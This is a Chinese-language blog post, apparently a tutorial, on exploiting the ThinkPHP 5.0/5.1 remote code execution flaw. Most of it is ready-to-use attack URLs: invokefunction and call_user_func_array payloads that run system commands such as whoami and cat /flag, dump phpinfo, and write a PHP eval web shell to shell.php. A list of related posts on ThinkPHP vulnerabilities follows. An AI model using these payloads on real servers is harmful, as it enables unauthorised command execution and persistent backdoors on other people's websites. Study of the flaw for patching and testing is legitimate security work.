ThinkPHP漏洞利用
漏洞标志
影响版本
ThinkPHP 5.0.x ~ 5.0.23
ThinkPHP 5.1.x ~ 5.1.31
- 漏洞利用
先查看版本号。在网址上随意输入一个不存在的模块 地址:
可以看到,thinkphp 版本为 5.0.20
查看信息
漏洞利用
大致原理:
漏洞程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。
详情参考:https://www.cnblogs.com/backlion/p/10106676.html
初步利用代码如下:
index.php?s=index/\namespace\class/method
这将会实例化\namespace\class类并执行method方法
远程代码执行命令:whoami(链接后面的whoami可以改成你要执行的命令,特殊符号请进行url转码)
http://xxx.xxx.xxx(这里为你的域名)/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
或者
/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php> -r ‘system(“cat /flag”);’
/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
通过phpinfo函数写出phpinfo的信息
http://xxx.xxx.xxx/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
写入shell
http://xxx.xxx.xxx/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22snowwolf%22])?^%3E%3Eshell.php
显示phpinfo
http://xxx.xxx.xxx/public/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
ThinkPHP漏洞利用相关推荐
- ThinkPHP V5 漏洞利用
ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有 ...
- thinkphp漏洞_【组件攻击链】ThinkCMF 高危漏洞分析与利用
一.组件介绍 1.1 基本信息 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架.ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形 ...
- php %3c0x1a%3e是什么_利用ThinkPHP漏洞扫描攻击
利用ThinkPHP漏洞扫描攻击 115.238.244.112 119.3.90.139 94.191.10.105 POST /index.php/?s=captcha HTTP/1.1 ...
- 网站安全检测 漏洞检测 对thinkphp通杀漏洞利用与修复建议
thinkphp在国内来说,很多站长以及平台都在使用这套开源的系统来建站,为什么会这么深受大家的喜欢,第一开源,便捷,高效,生成静态化html,第二框架性的易于开发php架构,很多第三方的插件以及第三 ...
- php命令执行漏洞利用,ThinkPHP 5.0 5.1远程命令执行漏洞利用分析
1漏洞利用方式 5.0版本POC(不唯一) 命令执行:? s=index/thinkapp/invokefunction&function=call_user_func_array&v ...
- ThinkPHP漏洞总结(利用)
ThinkPHP介绍 ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从S ...
- ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell)
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的ge ...
- Botnet趋势漏洞利用状况分析
执行摘要 在过去的一年中,世界遭受了新冠疫情的袭击,生产生活受到了极大的影响.但在网络世界中,僵 尸网络作为多年来的主要威胁形式之一,并未受到疫情的影响,反而更加活.今年,绿盟科技和国家 互联网 应急 ...
- thinkphp漏洞复现
所有文章,仅供安全研究与学习之用,后果自负! thinkphp漏洞 前言 一.thinkphp-2x-rce 代码执行 0x01 漏洞描述 0x02 影响版本 0x03 漏洞利用 0x04 漏洞修复 ...
最新文章
- Spring Boot配置@spring.profiles.active配置
- java工程师面试如何自我介绍
- java servlet练习测试
- 122 - Trees on the level(模拟内存池解法)
- 虚拟服务器ip是什么意思,虚拟主机独立ip是什么意思
- 普通话转粤语_语音转文字评测:几款语音转文字app,你了解多少?
- 用jquery给Struts2的s:radio /标签添加change事件
- Java第五次作业 ,面向对象高级特性(抽象类与接口)
- Centos7安装Fail2Ban并利用163邮箱发送邮件提醒功能
- 一些常用软件的网络端口协议分类介绍
- Visual Odometry
- axio的请求异常响应统一处理
- 数据分析~matlab plot 坐标、字体、子图
- eclipse cdt + rse文件保存遇到的问题
- Excel如何把同一列的内容拆分为两列?
- HTML图片不能上下铺满屏幕_多张图片的PPT,如何排版的更有创意?
- Altium designer2020基础使用教程
- Three.js实现的网站页面金字塔模型显示
- 手机 html 全屏,手机投屏开启满屏模式
- 产品经理的修炼:如何把梳子卖给和尚